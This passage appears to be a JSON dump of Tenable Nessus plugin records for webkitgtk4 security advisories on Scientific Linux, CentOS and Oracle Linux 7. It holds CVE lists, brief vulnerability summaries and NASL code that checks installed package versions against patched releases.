value:\"http://www.nessus.org/u?55230a62\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:webkitgtk4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:webkitgtk4-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"webkitgtk4-2.28.2-2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"webkitgtk4-debuginfo-2.28.2-2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"webkitgtk4-devel-2.28.2-2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"webkitgtk4-doc-2.28.2-2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"webkitgtk4-jsc-2.28.2-2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"webkitgtk4-jsc-devel-2.28.2-2.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4 / webkitgtk4-debuginfo / webkitgtk4-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:13:10", "description": "The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2020:4035 advisory.\n\n - webkitgtk: HTTP proxy setting deanonymization information disclosure (CVE-2019-11070)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8644, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8707, CVE-2019-8710, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8763, CVE-2019-8765, CVE-2019-8766, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823, CVE-2020-3868)\n\n - webkitgtk: processing maliciously crafted web content lead to URI spoofing (CVE-2019-6251)\n\n - webkitgtk: malicous web content leads to arbitrary code execution (CVE-2019-8506)\n\n - webkitgtk: malicious web content leads to arbitrary code execution (CVE-2019-8524, CVE-2019-8559, CVE-2019-8563)\n\n - webkitgtk: malicious crafted web content leads to arbitrary code execution (CVE-2019-8535, CVE-2019-8536, CVE-2019-8558)\n\n - webkitgtk: malicious crafted web content leads to arbitrary we content (CVE-2019-8544)\n\n - webkitgtk: malicious web content leads to cross site scripting (CVE-2019-8551)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8625, CVE-2019-8649, CVE-2019-8658, CVE-2019-8674, CVE-2019-8690, CVE-2019-8719, CVE-2019-8813, CVE-2020-3867)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-8743)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8764)\n\n - webkitgtk: Browsing history could not be deleted (CVE-2019-8768)\n\n - webkitgtk: Websites could reveal browsing history (CVE-2019-8769)\n\n - webkitgtk: Violation of iframe sandboxing policy (CVE-2019-8771)\n\n - webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-8835, CVE-2019-8844)\n\n - webkitgtk: Use after free issue may lead to remote code execution (CVE-2019-8846)\n\n - webkitgtk: Use-after-free issue in accessibility/AXObjectCache.cpp (CVE-2020-10018)\n\n - webkitgtk: use-after-free via crafted web content (CVE-2020-11793)\n\n - webkitgtk: Denial of service via incorrect memory handling (CVE-2020-3862)\n\n - webkitgtk: Non-unique security origin for DOM object contexts (CVE-2020-3864)\n\n - webkitgtk: Incorrect security check for a top-level DOM object context (CVE-2020-3865)\n\n - webkitgtk: Incorrect processing of file URLs (CVE-2020-3885)\n\n - webkitgtk: Race condition allows reading of restricted memory (CVE-2020-3894)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3895)\n\n - webkitgtk: Type confusion leading to arbitrary code execution (CVE-2020-3897, CVE-2020-3901)\n\n - webkitgtk: Memory consumption issue leading to arbitrary code execution (CVE-2020-3899)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3900)\n\n - webkitgtk: Input validation issue leading to cross-site script attack (CVE-2020-3902)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-30T00:00:00", "type": "nessus", "title": "CentOS 7 : webkitgtk4 (CESA-2020:4035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:centos:centos:webkitgtk4", "p-cpe:/a:centos:centos:webkitgtk4-devel", "p-cpe:/a:centos:centos:webkitgtk4-doc", "p-cpe:/a:centos:centos:webkitgtk4-jsc", "p-cpe:/a:centos:centos:webkitgtk4-jsc-devel", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2020-4035.NASL", "href": "https://www.tenable.com/plugins/nessus/143288", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4035 and\n# CentOS Errata and Security Advisory 2020:4035 respectively.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143288);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8625\",\n \"CVE-2019-8644\",\n \"CVE-2019-8649\",\n \"CVE-2019-8658\",\n \"CVE-2019-8666\",\n \"CVE-2019-8669\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8674\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8678\",\n \"CVE-2019-8679\",\n \"CVE-2019-8680\",\n \"CVE-2019-8681\",\n \"CVE-2019-8683\",\n \"CVE-2019-8684\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8688\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8707\",\n \"CVE-2019-8710\",\n \"CVE-2019-8719\",\n \"CVE-2019-8720\",\n \"CVE-2019-8726\",\n \"CVE-2019-8733\",\n \"CVE-2019-8735\",\n \"CVE-2019-8743\",\n \"CVE-2019-8763\",\n \"CVE-2019-8764\",\n \"CVE-2019-8765\",\n \"CVE-2019-8766\",\n \"CVE-2019-8768\",\n \"CVE-2019-8769\",\n \"CVE-2019-8771\",\n \"CVE-2019-8782\",\n \"CVE-2019-8783\",\n \"CVE-2019-8808\",\n \"CVE-2019-8811\",\n \"CVE-2019-8812\",\n \"CVE-2019-8813\",\n \"CVE-2019-8814\",\n \"CVE-2019-8815\",\n \"CVE-2019-8816\",\n \"CVE-2019-8819\",\n \"CVE-2019-8820\",\n \"CVE-2019-8821\",\n \"CVE-2019-8822\",\n \"CVE-2019-8823\",\n \"CVE-2019-8835\",\n \"CVE-2019-8844\",\n \"CVE-2019-8846\",\n \"CVE-2019-11070\",\n \"CVE-2020-3862\",\n \"CVE-2020-3864\",\n \"CVE-2020-3865\",\n \"CVE-2020-3867\",\n \"CVE-2020-3868\",\n \"CVE-2020-3885\",\n \"CVE-2020-3894\",\n \"CVE-2020-3895\",\n \"CVE-2020-3897\",\n \"CVE-2020-3899\",\n \"CVE-2020-3900\",\n \"CVE-2020-3901\",\n \"CVE-2020-3902\",\n \"CVE-2020-10018\",\n \"CVE-2020-11793\"\n );\n script_bugtraq_id(\n 108497,\n 108566,\n 109328,\n 109329\n );\n script_xref(name:\"RHSA\", value:\"2020:4035\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n\n script_name(english:\"CentOS 7 : webkitgtk4 (CESA-2020:4035)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4035 advisory.\n\n - webkitgtk: HTTP proxy setting deanonymization information disclosure (CVE-2019-11070)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-6237,\n CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611,\n CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8644, CVE-2019-8666, CVE-2019-8669,\n CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679,\n CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688,\n CVE-2019-8689, CVE-2019-8707, CVE-2019-8710, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735,\n CVE-2019-8763, CVE-2019-8765, CVE-2019-8766, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,\n CVE-2019-8812, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821,\n CVE-2019-8822, CVE-2019-8823, CVE-2020-3868)\n\n - webkitgtk: processing maliciously crafted web content lead to URI spoofing (CVE-2019-6251)\n\n - webkitgtk: malicous web content leads to arbitrary code execution (CVE-2019-8506)\n\n - webkitgtk: malicious web content leads to arbitrary code execution (CVE-2019-8524, CVE-2019-8559,\n CVE-2019-8563)\n\n - webkitgtk: malicious crafted web content leads to arbitrary code execution (CVE-2019-8535, CVE-2019-8536,\n CVE-2019-8558)\n\n - webkitgtk: malicious crafted web content leads to arbitrary we content (CVE-2019-8544)\n\n - webkitgtk: malicious web content leads to cross site scripting (CVE-2019-8551)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8625,\n CVE-2019-8649, CVE-2019-8658, CVE-2019-8674, CVE-2019-8690, CVE-2019-8719, CVE-2019-8813, CVE-2020-3867)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-8743)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8764)\n\n - webkitgtk: Browsing history could not be deleted (CVE-2019-8768)\n\n - webkitgtk: Websites could reveal browsing history (CVE-2019-8769)\n\n - webkitgtk: Violation of iframe sandboxing policy (CVE-2019-8771)\n\n - webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-8835,\n CVE-2019-8844)\n\n - webkitgtk: Use after free issue may lead to remote code execution (CVE-2019-8846)\n\n - webkitgtk: Use-after-free issue in accessibility/AXObjectCache.cpp (CVE-2020-10018)\n\n - webkitgtk: use-after-free via crafted web content (CVE-2020-11793)\n\n - webkitgtk: Denial of service via incorrect memory handling (CVE-2020-3862)\n\n - webkitgtk: Non-unique security origin for DOM object contexts (CVE-2020-3864)\n\n - webkitgtk: Incorrect security check for a top-level DOM object context (CVE-2020-3865)\n\n - webkitgtk: Incorrect processing of file URLs (CVE-2020-3885)\n\n - webkitgtk: Race condition allows reading of restricted memory (CVE-2020-3894)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3895)\n\n - webkitgtk: Type confusion leading to arbitrary code execution (CVE-2020-3897, CVE-2020-3901)\n\n - webkitgtk: Memory consumption issue leading to arbitrary code execution (CVE-2020-3899)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3900)\n\n - webkitgtk: Input validation issue leading to cross-site script attack (CVE-2020-3902)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.centos.org/pipermail/centos-cr-announce/2020-October/012864.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d8032934\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/94.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/119.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/416.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-10018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 79, 94, 119, 200, 400, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkitgtk4-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'CentOS 7.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'webkitgtk4-2.28.2-2.el7', 'cpu':'i686', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-2.28.2-2.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-devel-2.28.2-2.el7', 'cpu':'i686', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-devel-2.28.2-2.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-doc-2.28.2-2.el7', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.el7', 'cpu':'i686', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.el7', 'cpu':'i686', 'release':'CentOS-7'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.el7', 'cpu':'x86_64', 'release':'CentOS-7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkitgtk4 / webkitgtk4-devel / webkitgtk4-doc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:18", "description": "The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2020-4035 advisory.\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8558, CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - A logic issue existed in the handling of synchronous page 